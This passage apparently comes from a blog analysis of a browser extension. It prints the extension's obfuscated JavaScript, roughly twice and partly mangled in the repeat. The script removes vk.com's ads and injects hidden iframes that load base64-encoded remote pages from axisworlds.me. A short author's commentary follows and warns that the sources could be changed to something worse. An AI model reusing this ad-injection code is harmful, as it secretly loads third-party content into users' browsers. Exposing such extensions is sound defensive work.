'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9zZWFyY2hwbHVzLm1lL3ZhZHZhL3ZhZHZyY2EuaHRtbA==']; return _0xb14bxe[Math['floor'](Math['random']() * _0xb14bxe['length'])]['substr'](3) } function _0xb14bxf(_0xb14bx10, _0xb14bx11, _0xb14bx12, _0xb14bx13, _0xb14bx14, _0xb14bx15) { if (_0xb14bx13 == 0 && _0xb14bx14 == 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 != 0 && _0xb14bx14 == 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "display": _0xb14bx13 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 == 0 && _0xb14bx14 != 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "position": _0xb14bx14 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 != 0 && _0xb14bx14 != 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "display": _0xb14bx13 , "position": _0xb14bx14 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) } } var _0xb14bx16 = document['getElementById'](asrcfrmn + '_a'); var _0xb14bx17 = document['getElementById'](asrcfrmn + '_b'); if (_0xb14bx16['style']['display'] == 'none') { _0xb14bx16['setAttribute']('src', atob(_0xb14bxe())); function _0xb14bx18() { document['getElementById'](asrcfrmn + '_a')['onload'] = null; if (_0xb14bx16['getAttribute']('src') != null) { $('#' + asrcfrmn + '_b')['css']({ "z-index": '100' , "position": 'static' }); $('#' + asrcfrmn + '_a')['css']({ "z-index": '101' , "position": 'absolute' , "opacity": 0 , "display": 'block' , "top": 0 , "left": 0 }); _0xb14bxf('#' + asrcfrmn + '_a', 200, 1, 0, 'static', 0); _0xb14bxf('#' + asrcfrmn + '_b', 200, 0, 'none', 0, 1) } } document['getElementById'](asrcfrmn + '_a')['onload'] = _0xb14bx18 } else { _0xb14bx17['setAttribute']('src', atob(_0xb14bxe())); function _0xb14bx19() { document['getElementById'](asrcfrmn + '_b')['onload'] = null; if (_0xb14bx17['getAttribute']('src') != null) { $('#' + asrcfrmn + '_a')['css']({ "z-index": '100' , "position": 'static' }); $('#' + asrcfrmn + '_b')['css']({ "z-index": '101' , "position": 'absolute' , "opacity": 0 , "display": 'block' , "top": 0 , "left": 0 }); _0xb14bxf('#' + asrcfrmn + '_b', 200, 1, 0, 'static', 0); _0xb14bxf('#' + asrcfrmn + '_a', 200, 0, 'none', 0, 1) } } document['getElementById'](asrcfrmn + '_b')['onload'] = _0xb14bx19 } } var winact; var eventct = 1; function RI() { IRF = setInterval(function () { if (winact == 'active') { SETSRCFRM() } }, 120000) } function FR() { setTimeout(function () { eventct = 0 }, 3500) } function CL() { if (eventct == 0) { eventct = 1; SETSRCFRM(); clearInterval(IRF); RI(); FR() } } function RLA() { $('#left_ads, #ads_left')['remove'](); setTimeout(RLA, 30000) } function MAINSTART() { SETSRCFRM(vkui); FR(); RI(); RLA(); var _0xb14bx21 = $('#side_bar_inner ol')['height']() - 8; if (_0xb14bx21 > 6) { $('#side_bar_inner')['css']('height', _0xb14bx21) }; $('a, a span')['click'](function () { CL() }); $(document)['on']('click', 'a div, div a, button, a > b', function () { CL() }); setTimeout(function () { $('#left_blocks, .left_holiday')['animate']({ "opacity": '0' }, 300, function () { $('#left_blocks, .left_holiday')['hide']() }) }, 10000); var _0xb14bx22; $(document)['mousemove'](function () { if (winact != 'active') { winact = 'active' }; clearTimeout(_0xb14bx22); _0xb14bx22 = setTimeout(function () { winact = 'inactive' }, 120000) }); $(document)['hover'](function (_0xb14bx23) { if (_0xb14bx23['fromElement']) { winact = 'inactive'; clearTimeout(_0xb14bx22) } else { winact = 'active' } }) } var trystart = 0; function START() { trystart += 1; if (window['jQuery']) { MAINSTART() } else { if (trystart > 35) { var _0xb14bx26 = document['createElement']('script'); _0xb14bx26['type'] = 'text/javascript'; _0xb14bx26['src'] = '//code.jquery.com/jquery-1.12.3.min.js'; document['head']['appendChild'](_0xb14bx26) }; if (trystart < 500) { setTimeout(START, 75) } } } START(); var st = document['createElement']('style'); st['innerHTML'] = '#left_ads,#left_ads > *,#ads_left,#ads_left > * > *,div[id*="ayments_bo"],div[class*="anding_moneysen"],div[id*="ds_page_simpl"] div[class*="ds_intro_pag"],div[id*="ickets_conten"] div[id*="ew_ticke"],div[id="ads_page_wrap3"],div[class*="log_about_pres"] div[class*="log_about_wra"]{display:none!important;opacity:0!important;height:0px!important;min-height:0px!important;}'; document['head']['appendChild'](st) aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA == ',' aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA ==', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA ==', 'aRMLy9zZWFyY2hwbHVzLm1lL3ZhZHZhL3ZhZHZyY2EuaHRtbA ==']; if (document['getElementById']('ads_left') != null) { document['getElementById']('ads_left')['innerHTML'] = '' }; if (document['getElementById']('left_ads') != null) { document['getElementById']('left_ads')['innerHTML'] = '' }; var vkui = 1; if (document['getElementById']('side_bar_inner') == null) { vkui = 2 }; function A() { var _0xb14bx3 = ''; var _0xb14bx4 = 'abcdefghijklmnopqrstuvwxyz_'; for (var _0xb14bx5 = 0; _0xb14bx5 < 32; _0xb14bx5++) { _0xb14bx3 += _0xb14bx4['charAt'](Math['floor'](Math['random']() * _0xb14bx4['length'])) }; return _0xb14bx3 } var asrcfrmn = A(); function SETSRCFRM(_0xb14bx8) { var _0xb14bx9; if (_0xb14bx8 == 1) { _0xb14bx9 = 'side_bar_inner' } else { _0xb14bx9 = 'side_bar' }; if (document['getElementById'](_0xb14bx9) != null && document['getElementById'](asrcfrmn) == null && document['getElementById'](asrcfrmn + '_a') == null && document['getElementById']('quick_login') == null) { var _0xb14bxa = document['createElement']('div'); _0xb14bxa['setAttribute']('id', asrcfrmn); _0xb14bxa['setAttribute']('style', 'position:relative;'); if (_0xb14bx8 == 1) { $('#' + _0xb14bx9 + ' ol')['after'](_0xb14bxa) } else { $('#' + _0xb14bx9)['append'](_0xb14bxa) }; var _0xb14bxb = 'display:none;padding:0px;padding-top:0px;border:none;width:130px;height:1080px;overflow:hidden;z-index:100;position:static;'; var _0xb14bxc = document['createElement']('iframe'); _0xb14bxc['setAttribute']('style', _0xb14bxb); _0xb14bxc['setAttribute']('id', asrcfrmn + '_a'); _0xb14bxc['setAttribute']('marginwidth', '0'); _0xb14bxc['setAttribute']('marginheight', '0'); _0xb14bxc['setAttribute']('scrolling', 'no'); _0xb14bxc['setAttribute']('frameborder', '0'); $('#' + asrcfrmn)['append'](_0xb14bxc); var _0xb14bxd = document['createElement']('iframe'); _0xb14bxd['setAttribute']('style', _0xb14bxb); _0xb14bxd['setAttribute']('id', asrcfrmn + '_b'); _0xb14bxd['setAttribute']('marginwidth', '0'); _0xb14bxd['setAttribute']('marginheight', '0'); _0xb14bxd['setAttribute']('scrolling', 'no'); _0xb14bxd['setAttribute']('frameborder', '0'); $('#' + asrcfrmn)['append'](_0xb14bxd) }; function _0xb14bxe() { var _0xb14bxe = ['aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2cmNrdGFoLmh0bWw=', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGQuY28vYWR2cGFnZXMvdmFkdmFhYS92YWR2bWdoYS5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdnJja3RhaC5odG1s', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9heGlzd29ybGRzLm1lL2FkdnBhZ2VzL3ZhZHZhYWEvdmFkdm1naGEuaHRtbA==', 'aRMLy9zZWFyY2hwbHVzLm1lL3ZhZHZhL3ZhZHZyY2EuaHRtbA==']; return _0xb14bxe[Math['floor'](Math['random']() * _0xb14bxe['length'])]['substr'](3) } function _0xb14bxf(_0xb14bx10, _0xb14bx11, _0xb14bx12, _0xb14bx13, _0xb14bx14, _0xb14bx15) { if (_0xb14bx13 == 0 && _0xb14bx14 == 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 != 0 && _0xb14bx14 == 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "display": _0xb14bx13 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 == 0 && _0xb14bx14 != 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "position": _0xb14bx14 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) }; if (_0xb14bx13 != 0 && _0xb14bx14 != 0) { $(_0xb14bx10)['animate']({ opacity: _0xb14bx12 }, _0xb14bx11, function () { $(_0xb14bx10)['css']({ "display": _0xb14bx13 , "position": _0xb14bx14 }); if (_0xb14bx15 == 1) { $(_0xb14bx10)['removeAttr']('src') } }) } } var _0xb14bx16 = document['getElementById'](asrcfrmn + '_a'); var _0xb14bx17 = document['getElementById'](asrcfrmn + '_b'); if (_0xb14bx16['style']['display'] == 'none') { _0xb14bx16['setAttribute']('src', atob(_0xb14bxe())); function _0xb14bx18() { document['getElementById'](asrcfrmn + '_a')['onload'] = null; if (_0xb14bx16['getAttribute']('src') != null) { $('#' + asrcfrmn + '_b')['css']({ "z-index": '100' , "position": 'static' }); $('#' + asrcfrmn + '_a')['css']({ "z-index": '101' , "position": 'absolute' , "opacity": 0 , "display": 'block' , "top": 0 , "left": 0 }); _0xb14bxf('#' + asrcfrmn + '_a', 200, 1, 0, 'static', 0); _0xb14bxf('#' + asrcfrmn + '_b', 200, 0, 'none', 0, 1) } } document['getElementById'](asrcfrmn + '_a')['onload'] = _0xb14bx18 } else { _0xb14bx17['setAttribute']('src', atob(_0xb14bxe())); function _0xb14bx19() { document['getElementById'](asrcfrmn + '_b')['onload'] = null; if (_0xb14bx17['getAttribute']('src') != null) { $('#' + asrcfrmn + '_a')['css']({ "z-index": '100' , "position": 'static' }); $('#' + asrcfrmn + '_b')['css']({ "z-index": '101' , "position": 'absolute' , "opacity": 0 , "display": 'block' , "top": 0 , "left": 0 }); _0xb14bxf('#' + asrcfrmn + '_b', 200, 1, 0, 'static', 0); _0xb14bxf('#' + asrcfrmn + '_a', 200, 0, 'none', 0, 1) } } document['getElementById'](asrcfrmn + '_b')['onload'] = _0xb14bx19 } } var winact; var eventct = 1; function RI() { IRF = setInterval(function () { if (winact == 'active') { SETSRCFRM() } }, 120000) } function FR() { setTimeout(function () { eventct = 0 }, 3500) } function CL() { if (eventct == 0) { eventct = 1; SETSRCFRM(); clearInterval(IRF); RI(); FR() } } function RLA() { $('#left_ads, #ads_left')['remove'](); setTimeout(RLA, 30000) } function MAINSTART() { SETSRCFRM(vkui); FR(); RI(); RLA(); var _0xb14bx21 = $('#side_bar_inner ol')['height']() - 8; if (_0xb14bx21 > 6) { $('#side_bar_inner')['css']('height', _0xb14bx21) }; $('a, a span')['click'](function () { CL() }); $(document)['on']('click', 'a div, div a, button, a > b', function () { CL() }); setTimeout(function () { $('#left_blocks, .left_holiday')['animate']({ "opacity": '0' }, 300, function () { $('#left_blocks, .left_holiday')['hide']() }) }, 10000); var _0xb14bx22; $(document)['mousemove'](function () { if (winact != 'active') { winact = 'active' }; clearTimeout(_0xb14bx22); _0xb14bx22 = setTimeout(function () { winact = 'inactive' }, 120000) }); $(document)['hover'](function (_0xb14bx23) { if (_0xb14bx23['fromElement']) { winact = 'inactive'; clearTimeout(_0xb14bx22) } else { winact = 'active' } }) } var trystart = 0; function START() { trystart += 1; if (window['jQuery']) { MAINSTART() } else { if (trystart > 35) { var _0xb14bx26 = document['createElement']('script'); _0xb14bx26['type'] = 'text/javascript'; _0xb14bx26['src'] = '//code.jquery.com/jquery-1.12.3.min.js'; document['head']['appendChild'](_0xb14bx26) }; if (trystart < 500) { setTimeout(START, 75) } } } START(); var st = document['createElement']('style'); st['innerHTML'] = '#left_ads,#left_ads > *,#ads_left,#ads_left > * > *,div[id*="ayments_bo"],div[class*="anding_moneysen"],div[id*="ds_page_simpl"] div[class*="ds_intro_pag"],div[id*="ickets_conten"] div[id*="ew_ticke"],div[id="ads_page_wrap3"],div[class*="log_about_pres"] div[class*="log_about_wra"]{display:none!important;opacity:0!important;height:0px!important;min-height:0px!important;}'; document['head']['appendChild'](st) The script deletes the advertisement that vk.com renders, after which 2 Iframe elements are created. An advertisement with url =: "// axisworlds.me/advpages/vadvaaa/vadvmgh.html" is drawn in one of the iframe,
then Iframe with ads is placed on the site of the “legitimate” advertising site vk.com.
Instead of an epilogue.
Maybe it's just my prejudices, but still. At the moment, the extension simply redraws advertising in two social networks, but at the same time, re-qualifying it as something more serious, changing the sources on the server will not be the owner.
Thanks for attention!
Source: https://habr.com/ru/post/315038/
All Articles